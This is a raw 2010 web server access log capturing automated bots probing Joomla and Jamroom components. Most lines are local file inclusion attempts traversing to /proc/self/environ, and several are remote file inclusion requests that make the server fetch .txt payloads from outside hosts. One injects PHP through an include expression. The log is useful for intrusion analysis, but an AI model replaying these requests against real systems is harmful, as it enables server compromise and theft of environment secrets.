66.71.188.11 - - [13/Jun/2010:00:30:46 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:00:30:46 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.32.22.130 - - [13/Jun/2010:00:31:51 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
72.47.211.173 - - [13/Jun/2010:00:34:36 -0500] "GET /logs/access_log.1223683200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.79"
209.126.254.57 - - [13/Jun/2010:00:38:32 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
209.126.254.57 - - [13/Jun/2010:00:38:32 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
209.126.254.57 - - [13/Jun/2010:00:38:32 -0500] "GET /logs/access_log.1274572800/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
209.126.254.57 - - [13/Jun/2010:00:39:10 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
209.126.254.57 - - [13/Jun/2010:00:39:10 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
209.126.254.57 - - [13/Jun/2010:00:39:10 -0500] "GET /logs/access_log.1271721600/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
69.163.243.244 - - [13/Jun/2010:00:40:44 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
69.163.243.244 - - [13/Jun/2010:00:40:45 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
69.163.243.244 - - [13/Jun/2010:00:40:45 -0500] "GET /logs/access_log.1271548800/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
85.17.199.105 - - [13/Jun/2010:00:40:48 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
85.17.199.105 - - [13/Jun/2010:00:40:49 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
85.17.199.105 - - [13/Jun/2010:00:40:49 -0500] "GET /logs/access_log.1274572800/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
85.17.199.105 - - [13/Jun/2010:00:40:49 -0500] "GET /logs/access_log.1274832000/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
180.150.132.234 - - [13/Jun/2010:00:41:32 -0500] "GET /logs/?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.810"
180.150.132.234 - - [13/Jun/2010:00:41:33 -0500] "GET /?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
207.46.199.49 - - [13/Jun/2010:00:45:36 -0500] "GET /logs/access_log.1218672000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.110.131.43 - - [13/Jun/2010:00:46:13 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
89.110.131.43 - - [13/Jun/2010:00:46:13 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
89.110.131.43 - - [13/Jun/2010:00:46:13 -0500] "GET /logs/access_log.1272499200/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
62.44.82.61 - - [13/Jun/2010:00:46:37 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:00:46:41 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 352 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:00:46:41 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 374 "-""Mozilla/5.0"
62.80.164.185 - - [13/Jun/2010:00:47:36 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.80.164.185 - - [13/Jun/2010:00:47:36 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.80.164.185 - - [13/Jun/2010:00:47:36 -0500] "GET /logs/access_log.1274572800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:00:47:44 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 352 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:00:47:44 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:00:47:45 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 374 "-""Mozilla/5.0"
207.46.199.200 - - [13/Jun/2010:00:47:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.80.164.185 - - [13/Jun/2010:00:49:15 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.80.164.185 - - [13/Jun/2010:00:49:15 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.80.164.185 - - [13/Jun/2010:00:49:15 -0500] "GET /logs/access_log.1274572800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pdd.co.kr/bbs/script/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:00:51:26 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:00:51:26 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:00:51:32 -0500] "GET /logs/access_log.1271548800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
209.51.155.138 - - [13/Jun/2010:00:52:27 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
209.51.155.138 - - [13/Jun/2010:00:52:27 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
209.51.155.138 - - [13/Jun/2010:00:52:27 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
209.51.155.138 - - [13/Jun/2010:00:52:27 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
209.51.155.138 - - [13/Jun/2010:00:52:30 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
209.51.155.138 - - [13/Jun/2010:00:52:30 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.115.111.248 - - [13/Jun/2010:00:52:38 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:42 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:42 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:44 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:46 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:48 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:50 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:52 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:54 -0500] "GET /logs/access_log.1217894400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:00:52:57 -0500] "GET /logs/access_log.1217980800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
94.23.0.30 - - [13/Jun/2010:00:54:34 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [13/Jun/2010:00:54:34 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [13/Jun/2010:00:54:34 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.0.30 - - [13/Jun/2010:00:54:34 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
74.86.227.26 - - [13/Jun/2010:00:54:37 -0500] "GET /logs/access_log.1274832000/?option=com_rd_download=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.86.227.26 - - [13/Jun/2010:00:54:38 -0500] "GET /?option=com_rd_download=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.86.227.26 - - [13/Jun/2010:00:54:38 -0500] "GET /logs/?option=com_rd_download=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.831"
85.214.85.210 - - [13/Jun/2010:00:55:24 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.69"
85.214.85.210 - - [13/Jun/2010:00:55:24 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.69"
85.214.85.210 - - [13/Jun/2010:00:55:24 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.69"
85.214.85.210 - - [13/Jun/2010:00:55:24 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.69"
85.214.85.210 - - [13/Jun/2010:00:55:25 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.69"
85.214.85.210 - - [13/Jun/2010:00:55:25 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.69"
85.214.85.210 - - [13/Jun/2010:00:55:25 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.69"
85.214.85.210 - - [13/Jun/2010:00:55:25 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.69"
66.71.188.11 - - [13/Jun/2010:00:57:33 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:00:57:34 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
219.240.36.36 - - [13/Jun/2010:00:59:03 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:00:59:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:00:59:04 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:00:59:17 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
72.18.137.210 - - [13/Jun/2010:01:04:33 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:04:34 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.195.112.180 - - [13/Jun/2010:01:08:56 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.45.185.154 - - [13/Jun/2010:01:09:35 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
207.45.185.154 - - [13/Jun/2010:01:09:35 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
207.45.185.154 - - [13/Jun/2010:01:09:35 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
67.195.112.180 - - [13/Jun/2010:01:09:50 -0500] "GET /logs/access_log.1273622400 HTTP/1.0" 200 446022 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.240.36.36 - - [13/Jun/2010:01:10:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:01:10:28 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:01:10:28 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
72.18.137.210 - - [13/Jun/2010:01:13:42 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.210.109.185 - - [13/Jun/2010:01:13:57 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:13:58 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:13:58 -0500] "GET /logs/access_log.1274572800/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:14:56 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:14:56 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:14:56 -0500] "GET /logs/access_log.1271721600/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
74.204.169.23 - - [13/Jun/2010:01:15:07 -0500] "GET /logs/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.831"
74.204.169.23 - - [13/Jun/2010:01:15:08 -0500] "GET /?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
209.126.254.57 - - [13/Jun/2010:01:15:17 -0500] "GET /?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:15:17 -0500] "GET /logs/?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:15:18 -0500] "GET /logs/access_log.1271635200/?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
64.79.194.247 - - [13/Jun/2010:01:16:18 -0500] "GET /logs/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.805"
64.79.194.247 - - [13/Jun/2010:01:16:18 -0500] "GET /?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
72.18.137.210 - - [13/Jun/2010:01:18:07 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.133.206.82 - - [13/Jun/2010:01:18:30 -0500] "GET //index.php?option=com_weberpcustomer&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:01:18:30 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:01:18:30 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:01:19:11 -0500] "GET /?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:19:11 -0500] "GET /logs/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:19:13 -0500] "GET /logs/access_log.1271462400/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
65.52.108.59 - - [13/Jun/2010:01:20:06 -0500] "GET /logs/access_log.1184284800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
